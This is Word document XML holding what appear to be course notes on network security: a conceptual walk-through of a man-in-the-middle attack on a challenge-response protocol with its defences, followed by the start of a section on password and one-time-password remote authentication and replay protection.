    <w:p w14:paraId="179CCC10" w14:textId="297BB15A" w:rsidR="00917A8E" w:rsidRDefault="0082177D" w:rsidP="00E54EC8">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how </w:t>
      </w:r>
      <w:r w:rsidRPr="0082177D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a man-in-the-middle attack would exploit the protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094FA32A" w14:textId="204F451E" w:rsidR="00E54EC8" w:rsidRDefault="00E54EC8" w:rsidP="00E54EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E54EC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alice initiates contact with Bob by sending "I'm Alice" to establish a connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE77CB4" w14:textId="5E3D4D8A" w:rsidR="00E54EC8" w:rsidRPr="00E54EC8" w:rsidRDefault="00E54EC8" w:rsidP="00E54EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E54EC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker, intercepts the communication between Alice and Bob, inserting </w:t>
      </w:r>
      <w:r w:rsidR="00EA48F8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>himself/herself</w:t>
      </w:r>
      <w:r w:rsidRPr="00E54EC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a "man in the middle."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1B4DF1" w14:textId="707E376E" w:rsidR="00E54EC8" w:rsidRDefault="00485876" w:rsidP="00E54EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="00485876">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impersonates Bob and sends a message to Alice pretending to be Bob.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A1495" w14:textId="5249580C" w:rsidR="00485876" w:rsidRPr="00485876" w:rsidRDefault="00485876" w:rsidP="00485876">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485876">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alice receives the message from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00485876">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, believing it to be from Bob, and generates a random challenge "R".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4561C3E1" w14:textId="6E2B4FEB" w:rsidR="00485876" w:rsidRPr="00485876" w:rsidRDefault="00485876" w:rsidP="00485876">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00485876">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alice encrypts the challenge with what she believes is Bob's key and sends "R, KAlice-Bob{R}" back to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00485876">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085B000" w14:textId="6FFDEDBC" w:rsidR="00017FEF" w:rsidRPr="00017FEF" w:rsidRDefault="00017FEF" w:rsidP="00017FEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> intercepts the message from Alice, decrypts it using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>his/</w:t>
      </w:r>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>her own key, and obtains the challenge "R".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7D14C" w14:textId="0736A4DB" w:rsidR="00017FEF" w:rsidRPr="00017FEF" w:rsidRDefault="00017FEF" w:rsidP="00017FEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> now has the challenge and can generate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>his/</w:t>
      </w:r>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>her own response, encrypting it as "R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Bob{R}".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DED45DF" w14:textId="13FCD1A7" w:rsidR="00017FEF" w:rsidRPr="00017FEF" w:rsidRDefault="00017FEF" w:rsidP="00017FEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends "R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Bob{R}" to Bob, pretending to be Alice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E07EDE" w14:textId="311DC0C4" w:rsidR="00017FEF" w:rsidRPr="00017FEF" w:rsidRDefault="00017FEF" w:rsidP="00017FEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Bob receives the message from </w:t>
      </w:r>
      <w:r w:rsidR="000E7B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00017FEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, believing it to be from Alice, and decrypts it using his key. Bob thinks the challenge is "R" and generates his own response, encrypting it as "RBob-Alice{R}".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352174EB" w14:textId="73A5C7D9" w:rsidR="00485876" w:rsidRDefault="000E7B95" w:rsidP="000E7B95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="000E7B95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> intercepts the response from Bob, decrypts it, and gains knowledge of the shared secret "R".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F0C89E" w14:textId="37F78D55" w:rsidR="000E7B95" w:rsidRDefault="000E7B95" w:rsidP="000E7B95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF5C89A" w14:textId="1000A403" w:rsidR="002D519A" w:rsidRPr="000E7B95" w:rsidRDefault="002D519A" w:rsidP="000E7B95">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D519A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">At this point, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="002D519A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has successfully performed a man-in-the-middle attack, obtaining the shared secret "R" without the knowledge of Alice or Bob. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="002D519A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can now impersonate both Alice and Bob, compromising the security and integrity of their communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0925A7" w14:textId="3013892C" w:rsidR="009E6B1B" w:rsidRDefault="00576EA5" w:rsidP="00576EA5">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576EA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To protect against man-in-the-middle attacks, it is crucial to establish a secure and authenticated channel between Alice and Bob. This can be achieved using techniques like secure key exchange protocols (e.g., Diffie-Hellman), digital signatures, or certificates to verify the identity of the communicating parties. These mechanisms ensure that the parties can authenticate each other and establish a secure communication channel that protects against impersonation and eavesdropping by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78823CAA" w14:textId="375E443D" w:rsidR="00AE3D19" w:rsidRDefault="00AE3D19" w:rsidP="00576EA5">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366CA304" w14:textId="47D75BB6" w:rsidR="00AE3D19" w:rsidRDefault="00AE3D19" w:rsidP="00AE3D19">
      <w:pPr>
        <w:ind w:left="-720" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Remote User Authentication Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE6364D" w14:textId="3EAA6011" w:rsidR="00AE3D19" w:rsidRDefault="00231DF9" w:rsidP="002F0025">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The protocols are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29343528" w14:textId="0E1850FA" w:rsidR="00231DF9" w:rsidRDefault="00231DF9" w:rsidP="002F0025">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00231DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password-based Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E73E31" w14:textId="4DAF2C06" w:rsidR="00231DF9" w:rsidRDefault="00231DF9" w:rsidP="00231DF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description: In this protocol, the user provides a password to the remote system, which is then compared with the stored password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438D199" w14:textId="19232199" w:rsidR="00231DF9" w:rsidRDefault="00231DF9" w:rsidP="00231DF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Defense against replay attacks: To defend against replay attacks in password-based authentication, the server can employ the following measures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCB9A1" w14:textId="0241B7D1" w:rsidR="00231DF9" w:rsidRDefault="00231DF9" w:rsidP="00231DF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implementing a challenge-response mechanism: The server can generate a random challenge and send it to the client. The client then combines the challenge with the password to compute a response. The response is unique to that specific challenge and cannot be reused in subsequent login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35850C" w14:textId="02C379DA" w:rsidR="00231DF9" w:rsidRDefault="00231DF9" w:rsidP="00231DF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Using timestamps: The server can include a timestamp in the challenge or as part of the authentication process. The server verifies that the timestamp is recent, ensuring that the authentication request is not a replay of an older message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026607C" w14:textId="30E4A394" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:ind w:left="-360" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>One-Time Password (OTP) Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6431CB" w14:textId="2C02AE8E" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073278A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description: OTP authentication generates a unique password for each login attempt, valid for that specific session only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF3973" w14:textId="53E91CA4" w:rsidR="0073278A" w:rsidRDefault="0073278A" w:rsidP="0073278A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
